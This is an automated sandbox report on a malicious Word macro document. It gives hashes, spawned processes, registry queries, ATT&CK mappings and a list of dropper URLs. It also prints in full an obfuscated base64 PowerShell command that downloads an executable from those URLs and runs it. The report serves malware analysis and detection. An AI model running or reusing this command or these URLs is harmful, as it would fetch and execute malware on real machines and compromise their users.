Behavioral Report

Analysis

max time kernel
26s
max time network
29s
platform
windows10_x64
resource
win10
submitted
28-10-2020 17:21

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac.doc
Size

218KB
MD5

8d7f667c5911d8e6c24bcbdbfe56b497
SHA1

e13f9c603441f701c0ca9a53bb9b69eb5cb071a9
SHA256

21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac
SHA512

cc60e5138a4f1ff38329f30507a2840550758ca1bc0469f9c347ed735eb55b9af8ae69eb0dd646d4a22189e38812a6b386d66c7df3a25d3d770297556993b9e0

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.saintmarcel.com/wp-includes/VKbL2/

exe.dropper

https://gayatrienterprise.org/wp-admin/DPBsj/

exe.dropper

https://weparditestaa.fi/wp-admin/72uPk/

exe.dropper

https://blog.6b47.com/Assets/w5U/

exe.dropper

https://www.easeiseasy.com/wp-admin/q/

exe.dropper

https://ursuperstar.com/wp-admin/AAxKlbV/

exe.dropper

https://kramedas.lt/wp-admin/E9Gciyc/

exe.dropper

https://critical-thinking.fr/wp-includes/vHQWren/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3700	3480	POwersheLL.exe

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

15 3700 POwersheLL.exe
19 3700 POwersheLL.exe
Executes dropped EXE 1 IoCs

Processes:

R1s2f0emk.exe

pid process

3996 R1s2f0emk.exe

flow	pid	process
15	3700	POwersheLL.exe
19	3700	POwersheLL.exe

pid	process
3996	R1s2f0emk.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

TTPs:

Query Registry System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey svchost.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3956 WINWORD.EXE
3956 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

POwersheLL.exe

pid process

3700 POwersheLL.exe
3700 POwersheLL.exe
3700 POwersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 3700 POwersheLL.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXER1s2f0emk.exe

pid process

3956 WINWORD.EXE
3956 WINWORD.EXE
3956 WINWORD.EXE
3956 WINWORD.EXE
3956 WINWORD.EXE
3956 WINWORD.EXE
3956 WINWORD.EXE
3996 R1s2f0emk.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\NGC\SoftLockoutVolatileKey	svchost.exe

pid	process
3956	WINWORD.EXE
3956	WINWORD.EXE

pid	process
3700	POwersheLL.exe
3700	POwersheLL.exe
3700	POwersheLL.exe

description	pid	process
Token: SeDebugPrivilege	3700	POwersheLL.exe

pid	process
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3996	R1s2f0emk.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\21509e892c4ef6e47bd2fe0d2290b20e48e4680f2f3537f12a061cd5912b1cac.doc" /o ""

Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

PID:3956

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe

POwersheLL -ENCOD UwBlAHQALQBJAFQARQBNACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBQAFYASgBVACAAIAAoACAAIABbAHQAWQBQAEUAXQAoACIAewAzAH0AewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQBNAC4AJwAsACcAaQBvAC4ARABpAHIAZQAnACwAJwBjAFQAbwByAFkAJwAsACcAUwB5AHMAVAAnACkAKQAgADsAIAAgACQARABUAE4AbQByAD0AIAAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADUAfQAiACAALQBGACcAcwB5AHMAdABlAE0ALgBuAEUAdAAuAFMAZQBSAHYASQBjAGUAJwAsACcAYQBuACcALAAnAFQAbQAnACwAJwBwACcALAAnAG8ASQBuACcALAAnAGEARwBlAFIAJwApACAAOwAgACQAVgB3ADYAMQB2AHAAdQA9ACgAJwBCACcAKwAoACcAMgAnACsAJwBoAHcAOQAnACkAKwAnADIAeAAnACkAOwAkAEUAagAyAHAAMQA1ADIAPQAkAEEAMwBhAHMANwBxAGEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAZAA5AGwAdgB4AG8AOwAkAE8AdQB2AGQAXwBhAG0APQAoACcAVwAnACsAKAAnAGUAMQAnACsAJwBfACcAKQArACgAJwAzACcAKwAnADMAcAAnACkAKQA7ACAAKAAgAGcASQAgACAAVgBhAFIASQBhAGIATABlADoAcAB2AGoAdQAgACkALgBWAEEAbAB1AGUAOgA6ACIAQwBgAFIARQBBAHQAZQBkAGAASQByAGAARQBDAHQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnADcAJwArACcAbwBQAFEAJwApACsAKAAnAHEANQA0ACcAKwAnADEAMAAnACsAJwBvADcAbwBQAFkAcQAnACkAKwAnAHIAdAAnACsAKAAnAGgAdAAxACcAKwAnADcAbwAnACkAKwAnAFAAJwApACAAIAAtAEMAcgBFAFAATABBAGMAZQAoAFsAQwBIAEEAUgBdADUANQArAFsAQwBIAEEAUgBdADEAMQAxACsAWwBDAEgAQQBSAF0AOAAwACkALABbAEMASABBAFIAXQA5ADIAKQApADsAJABVADUAcwBxAHQAaABrAD0AKAAoACcAUAAnACsAJwBlAGMAJwApACsAKAAnAHMAcgBqACcAKwAnAGUAJwApACkAOwAgACgAIAAgAEcAZQB0AC0AVgBhAHIASQBhAGIATABlACAARAB0AG4ATQBSACkALgB2AEEATABVAEUAOgA6ACIAcwBlAEMAdQByAGAASQBUAGAAeQBQAFIATwB0AG8AQwBPAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAnACkAKwAnADEAMgAnACkAOwAkAEkAdgBjAG4AZgB1AHoAPQAoACcATAAzACcAKwAnAHgAMwAnACsAKAAnADIAJwArACcAYQAwACcAKQApADsAJABNADMAegB5ADkAMQBqACAAPQAgACgAJwBSADEAJwArACgAJwBzACcAKwAnADIAZgAnACkAKwAnADAAJwArACgAJwBlAG0AJwArACcAawAnACkAKQA7ACQATQA2ADkANgAzAHgAYQA9ACgAKAAnAFEAJwArACcAZwAxACcAKQArACgAJwBiAGQAJwArACcAagAnACkAKwAnAGYAJwApADsAJABaADIAdgB0AHgAdgBnAD0AKAAoACcAVgAyADIAJwArACcAbgAnACkAKwAnAGsAbgAnACsAJwByACcAKQA7ACQAVABqAG0AbwA3AHkAZgA9ACQASABPAE0ARQArACgAKAAoACcAUgAnACsAJwBsAGUAJwArACcAUQBxADUAJwApACsAKAAnADQAMQAnACsAJwAwACcAKQArACcAbwBSACcAKwAnAGwAZQAnACsAKAAnAFkAcQAnACsAJwByAHQAJwApACsAKAAnAGgAdAAxAFIAJwArACcAbAAnACkAKwAnAGUAJwApAC4AIgBSAEUAUABgAEwAYABBAEMAZQAiACgAKAAnAFIAJwArACcAbABlACcAKQAsAFsAUwBUAHIASQBuAGcAXQBbAEMAaABhAHIAXQA5ADIAKQApACsAJABNADMAegB5ADkAMQBqACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAQwA4AGMANgBkAHcAYQA9ACgAJwBUACcAKwAoACcAcQAnACsAJwBuADMAJwApACsAKAAnAGcAJwArACcAeAB4ACcAKQApADsAJABYADAAMgB2AGIAYwBuAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMATABpAEUATgBUADsAJABBAGQANAAwAGwAOABoAD0AKAAoACgAKAAnAGgAdAB0AHAAcwAnACsAJwA6AF0AWwAgADEAKQAnACsAJwAgACcAKwAnAGoAagBrAGcAJwArACcAUwAgAFsAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgACcAKwAnAFsAXQB3AHcAdwB3ACcAKwAnAC4AcwBhAGkAbgAnACkAKQArACgAKAAnAHQAbQBhAHIAYwAnACsAJwBlAGwAJwArACcALgBjAG8AbQAnACsAJwBdAFsAIAAnACsAJwAxACcAKwAnACkAIAAnACsAJwBqACcAKwAnAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwB3AHAALQAnACsAJwBpAG4AYwBsAHUAZABlAHMAXQBbACAAMQApACAAJwArACcAagBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAVgBLAGIATAAyAF0AWwAgADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAJwApACkAKwAoACgAJwBdACAAJwArACcAWwBdACcAKwAnAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAJwArACcAIAAxACcAKwAnACkAJwArACcAIABqAGoAJwArACcAawBnAFMAIABbAF0AJwArACcAIABbACcAKwAnAF0AdwBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAawBnAFMAIABbAF0AIAAnACsAJwBbAF0AJwArACcAdwBnAGEAeQBhAHQAcgBpAGUAbgB0AGUAcgBwAHIAJwApACkAKwAoACgAJwBpAHMAZQAuAG8AJwArACcAcgBnAF0AWwAgADEAKQAgAGoAJwArACcAagAnACsAJwBrACcAKQApACsAKAAoACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAdwBwACcAKwAnAC0AYQBkAG0AaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAagBrAGcAUwAgACcAKwAnAFsAXQAgAFsAXQB3AEQAUABCAHMAJwArACcAagBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAJwApACkAKwAoACcAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwBAAGgAdAAnACkAKwAoACgAJwB0AHAAcwAnACsAJwA6ACcAKwAnAF0AWwAnACsAJwAgACcAKwAnADEAKQAgAGoAagBrAGcAJwArACcAUwAgAFsAXQAgAFsAXQAnACsAJwB3AF0AWwAnACsAJwAgACcAKQApACsAKAAoACcAMQApACAAJwArACcAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAdwBlAHAAJwArACcAYQAnACsAJwByAGQAJwArACcAaQB0AGUAJwArACcAcwAnACsAJwB0AGEAYQAuAGYAaQBdAFsAIAAxACcAKwAnACkAIAAnACsAJwBqAGoAawBnAFMAIABbAF0AJwArACcAIABbAF0AdwAnACkAKQArACgAKAAnAHcAJwArACcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAbgAnACsAJwBdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnAFMAIABbAF0AIABbAF0AdwA3ADIAdQAnACkAKQArACgAKAAnAFAAawBdAFsAIAAxACcAKwAnACkAJwArACcAIAAnACsAJwBqAGoAawBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbAF0AdwBAACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwApACkAKwAoACcAagAnACsAJwBrAGcAUwAgACcAKQArACgAKAAnAFsAJwArACcAXQAgACcAKwAnAFsAXQB3ACcAKwAnAF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgA2AGIANAA3ACcAKwAnAC4AYwBvAG0AXQBbACAAJwArACcAMQApACcAKQApACsAKAAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwBdACAAWwAnACsAJwBdAHcAQQBzAHMAZQB0AHMAXQBbACcAKQArACgAKAAnACAAMQApACAAJwArACcAagBqACcAKwAnAGsAJwArACcAZwAnACsAJwBTACAAWwBdACAAWwBdAHcAdwA1AFUAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqAGsAJwArACcAZwAnACsAJwBTACcAKwAnACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAQAAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzACcAKwAnADoAXQAnACsAJwBbACAAMQApACAAagBqACcAKwAnAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACAAJwArACcAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdwB3AHcALgBlAGEAcwBlAGkAcwBlACcAKQApACsAKAAoACcAYQAnACsAJwBzAHkAJwArACcALgBjAG8AbQBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIAAnACsAJwBbACcAKwAnAF0AJwArACcAIABbACcAKwAnAF0AdwB3ACcAKwAnAHAAJwApACkAKwAoACgAJwAtAGEAZABtAGkAbgBdAFsAIAAxACkAIABqAGoAJwArACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBxAF0AJwArACcAWwAnACsAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAJwArACcAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgACcAKwAnAFsAXQAgACcAKwAnAFsAXQB3AEAAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcABzACcAKwAnADoAJwArACcAXQBbACAAMQApACcAKwAnACAAJwArACcAagAnACsAJwBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdAHcAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAWwBdACcAKwAnACAAWwBdAHcAJwArACcAdQByACcAKwAnAHMAdQBwAGUAcgBzACcAKwAnAHQAYQByAC4AJwArACcAYwAnACkAKQArACgAKAAnAG8AbQBdAFsAJwArACcAIAAxACkAIAAnACsAJwBqAGoAawAnACkAKQArACgAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB3AHAALQBhACcAKwAnAGQAbQAnACsAJwBpAG4AXQBbACAAMQApACAAagAnACsAJwBqACcAKwAnAGsAZwAnACsAJwBTACcAKwAnACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAQQBBAHgAJwArACcASwBsAGIAVgBdAFsAJwArACcAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIAAnACsAJwBbAF0AIAAnACsAJwBbAF0AdwBAAGgAJwArACcAdAB0AHAAcwA6AF0AWwAgADEAJwArACcAKQAnACsAJwAgAGoAagBrAGcAUwAgACcAKQApACsAKAAoACcAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagBqAGsAZwAnACsAJwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdACcAKQApACsAKAAoACcAdwBrAHIAYQBtACcAKwAnAGUAZABhAHMALgBsAHQAXQBbACAAMQAnACsAJwApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAJwArACcAWwBdAHcAdwBwAC0AJwApACkAKwAoACgAJwBhAGQAbQBpAG4AXQBbACcAKwAnACAAMQApACAAagAnACsAJwBqAGsAZwBTACAAWwBdACAAWwBdACcAKwAnAHcARQAnACsAJwA5ACcAKwAnAEcAYwAnACsAJwBpAHkAYwBdAFsAIAAxACkAIABqAGoAawAnACsAJwBnACcAKwAnAFMAIABbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6AF0AWwAgADEAKQAnACsAJwAgAGoAagAnACsAJwBrACcAKwAnAGcAUwAgACcAKwAnAFsAXQAgAFsAJwArACcAXQB3AF0AJwArACcAWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrACcAKwAnAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAGMAcgBpACcAKQApACsAKAAnAHQAaQBjAGEAbAAtAHQAaAAnACsAJwBpAG4AawBpACcAKwAnAG4AJwArACcAZwAuACcAKQArACgAKAAnAGYAJwArACcAcgAnACsAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAIABbAF0AIAAnACsAJwBbAF0AdwAnACsAJwB3ACcAKwAnAHAALQAnACkAKQArACcAaQAnACsAKAAoACcAbgBjAGwAdQBkAGUAcwBdAFsAIAAnACsAJwAxACkAJwArACcAIAAnACkAKQArACgAJwBqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AdwAnACkAKwAoACgAJwB2AEgAJwArACcAUQAnACsAJwBXAHIAZQBuAF0AWwAgADEAKQAgAGoAagBrAGcAUwAgACcAKwAnAFsAJwArACcAXQAgAFsAXQB3ACcAKQApACkAKQAuACIAUgBFAGAAUABMAEEAYABDAGUAIgAoACgAKAAoACcAXQBbACAAJwArACcAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAoACcAagBqAGsAJwArACcAZwBTACcAKwAnACAAWwBdACAAWwAnACsAJwBdACcAKQArACcAdwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAHAAbABJAHQAIgAoACQAUAB5ADAAbgAzADMAdgAgACsAIAAkAEUAagAyAHAAMQA1ADIAIAArACAAJABSADIAYgBhADcAeABhACkAOwAkAFMAXwA5AGcAaABsAG4APQAoACgAJwBUACcAKwAnAHYAMgBoACcAKQArACcAaAAnACsAJwBvAGEAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGMAbgB1ADMAYQBsACAAaQBuACAAJABBAGQANAAwAGwAOABoACkAewB0AHIAeQB7ACQAWAAwADIAdgBiAGMAbgAuACIARABPAHcAbgBMAE8AYQBEAGAARgBgAGkAbABlACIAKAAkAFgAYwBuAHUAMwBhAGwALAAgACQAVABqAG0AbwA3AHkAZgApADsAJABDAHMAMgB4AG8AZQAwAD0AKAAoACcASQBmAGYAbgAnACsAJwB1ACcAKQArACcAXwBkACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAGoAbQBvADcAeQBmACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADIANAA0ADMAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAJwArACcAXwBQACcAKQArACcAcgBvACcAKwAoACcAYwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBjAFIAZQBhAGAAVABFACIAKAAkAFQAagBtAG8ANwB5AGYAKQA7ACQAQwBjAGcAegByAGIAbAA9ACgAKAAnAE8AJwArACcAdwBnAGEAbwAxACcAKQArACcAawAnACkAOwBiAHIAZQBhAGsAOwAkAFYAOQBvADcAbwA3AHcAPQAoACgAJwBQADYAJwArACcAYwBmAGEAJwApACsAJwA1ADMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABRADMAZQBsADYAcwB4AD0AKAAnAEwAbQAnACsAJwA1AHMAJwArACgAJwAzACcAKwAnAG0AOQAnACkAKQA=

Process spawned unexpected child process
Blacklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:3700

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:3996

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc

PID:1996

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService

PID:3256

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc

Modifies data under HKEY_USERS

PID:3776

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Query Registry

T1012

System Information Discovery

T1082

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Replay Monitor

00:00 00:00

Downloads

C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
4008b2ab3e959dc7b1bd7f62996e66bb

SHA1
7e344f5151d2908c1564fd84645fc1be91696926

SHA256
9654b16bba5f5891b86cabf640e7152899831d9c9e51c5a3bf6428d135c1623d

SHA512
10f8eee6a02ae792048e37301512dfc757246a497cb198dd11bcae8a1169d38f23ffa3405a031ee1b69b51c3ad0c3bf3f5eb98bfd122190d81077d0fdc5418b3

Download Submit
C:\Users\Admin\Qq5410o\Yqrtht1\R1s2f0emk.exe
MD5
4008b2ab3e959dc7b1bd7f62996e66bb

SHA1
7e344f5151d2908c1564fd84645fc1be91696926

SHA256
9654b16bba5f5891b86cabf640e7152899831d9c9e51c5a3bf6428d135c1623d

SHA512
10f8eee6a02ae792048e37301512dfc757246a497cb198dd11bcae8a1169d38f23ffa3405a031ee1b69b51c3ad0c3bf3f5eb98bfd122190d81077d0fdc5418b3

Download Submit
memory/3700-8-0x00007FF83FA90000-0x00007FF84047C000-memory.dmp

Filesize
9MB

Download
memory/3700-9-0x000001B2F8140000-0x000001B2F8141000-memory.dmp

Filesize
4KB

Download
memory/3700-10-0x000001B2F84E0000-0x000001B2F84E1000-memory.dmp

Filesize
4KB

Download
memory/3956-0-0x00007FF846F30000-0x00007FF847567000-memory.dmp

Filesize
6MB

Download
memory/3956-5-0x00000274A1D8B000-0x00000274A1D90000-memory.dmp

Filesize
20KB

Download